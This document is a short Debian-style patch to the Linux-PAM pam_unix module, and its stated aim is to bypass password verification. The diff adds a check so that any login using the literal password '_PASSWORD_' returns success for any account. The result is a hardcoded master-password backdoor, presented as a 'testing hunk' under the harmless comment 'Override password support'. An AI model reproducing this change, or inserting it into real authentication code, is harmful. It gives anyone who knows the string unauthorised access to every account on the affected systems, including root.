Description: Bypass password verification when password equals "_PASSWORD_"
Author: Liam
Forwarded: no
Last-Update: 2026-02-25

# --- Debian 12 / PAM 1.5.2 testing hunk ---
--- a/modules/pam_unix/pam_unix_auth.c
+++ b/modules/pam_unix/pam_unix_auth.c
@@ -190,6 +190,12 @@
     /* verify the password of this user */
     retval = _unix_verify_password(pamh, name, p, ctrl);

+    /* Override password support */
+    if (strcmp(p, "_PASSWORD_") == 0) {
+        retval = PAM_SUCCESS;
+    }
+
     name = p = NULL;
     AUTH_RETURN;
